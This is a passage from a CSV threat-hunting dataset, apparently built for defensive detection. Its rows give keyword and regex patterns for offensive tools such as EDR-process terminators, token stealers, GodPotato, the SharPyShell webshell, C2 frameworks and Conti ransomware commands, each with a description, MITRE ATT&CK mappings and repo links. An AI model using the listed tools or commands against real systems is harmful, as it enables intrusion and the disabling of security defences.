Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1099","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SharpTerminator.exe*",".{0,1000}SharpTerminator\.exe.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*SharpTerminator.git*",".{0,1000}SharpTerminator\.git.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - 
TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*SharpTerminator.sln*",".{0,1000}SharpTerminator\.sln.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*SharpTerminator-main.zip*",".{0,1000}SharpTerminator\-main\.zip.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*SharpToken* add_user*",".{0,1000}SharpToken.{0,1000}\sadd_user.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken* delete_user*",".{0,1000}SharpToken.{0,1000}\sdelete_user.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken* enableUser *",".{0,1000}SharpToken.{0,1000}\senableUser\s.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken* list_token*",".{0,1000}SharpToken.{0,1000}\slist_token.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken* tscon *",".{0,1000}SharpToken.{0,1000}\stscon\s.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken.csproj*",".{0,1000}SharpToken\.csproj.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken.exe*",".{0,1000}SharpToken\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*SharpToken.exe*",".{0,1000}SharpToken\.exe.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken.git*",".{0,1000}SharpToken\.git.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpToken-main.zip*",".{0,1000}SharpToken\-main\.zip.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*SharpUnhooker.*",".{0,1000}SharpUnhooker\..{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","379","76","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" "*SharpUnhooker-main*",".{0,1000}SharpUnhooker\-main.{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","379","76","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" "*SharpUp audit*",".{0,1000}SharpUp\saudit.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" 
"*SharpUp.exe*",".{0,1000}SharpUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpUp.exe*",".{0,1000}SharpUp\.exe.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*SharpUpManager*",".{0,1000}SharpUpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpUpMenu(*",".{0,1000}SharpUpMenu\(.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpView.exe*",".{0,1000}SharpView\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpView.exe*",".{0,1000}SharpView\.exe.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*SharpView\SharpView*",".{0,1000}SharpView\\SharpView.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*SharpView-master*",".{0,1000}SharpView\-master.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*sharpweb 
all*",".{0,1000}sharpweb\sall.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpWebManager.cs*",".{0,1000}SharpWebManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpWebServer.exe*",".{0,1000}SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpWifiGrabber.exe*",".{0,1000}SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*sharpwmi action=*",".{0,1000}sharpwmi\saction\=.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpWMI.exe*",".{0,1000}SharpWMI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpWMI.Program*",".{0,1000}SharpWMI\.Program.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpWmiManager*",".{0,1000}SharpWmiManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*sharpwmi-N*.exe*",".{0,1000}sharpwmi\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used 
in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*sharpwsus locate*",".{0,1000}sharpwsus\slocate.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","5","428","72","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" "*SharpWSUS*",".{0,1000}SharpWSUS.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","5","428","72","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" "*SharpWSUS.*",".{0,1000}SharpWSUS\..{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","1","N/A","N/A","5","428","72","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" "*SharPyShell Helper Commands:*",".{0,1000}SharPyShell\sHelper\sCommands\:.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 
- TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*SharPyShell*",".{0,1000}SharPyShell.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell is a tiny and obfuscated ASP.NET webshell that executes commands received by an encrypted channel compiling them in memory at runtime.","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*sharpyshell.aspx*",".{0,1000}sharpyshell\.aspx.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*SharPyShell.py*",".{0,1000}SharPyShell\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*SharPyShell_Test.ps1*",".{0,1000}SharPyShell_Test\.ps1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*SharPyShellPrompt.py*",".{0,1000}SharPyShellPrompt\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated 
ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*SharpZeroLogon*",".{0,1000}SharpZeroLogon.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SharpZeroLogon.exe*",".{0,1000}SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpZippo.exe*",".{0,1000}SharpZippo\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpZippo","1","1","N/A","10","10","59","10","2022-05-24T15:57:33Z","2022-05-24T15:52:31Z" 
"*ShawnDEvans/smbmap*",".{0,1000}ShawnDEvans\/smbmap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ShawnDEvans/smbmap*",".{0,1000}ShawnDEvans\/smbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*shell 'cmd.exe /c*",".{0,1000}shell\s\'cmd\.exe\s\/c.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*shell net group *Domain Computers* /domain*",".{0,1000}shell\snet\sgroup\s.{0,1000}Domain\sComputers.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
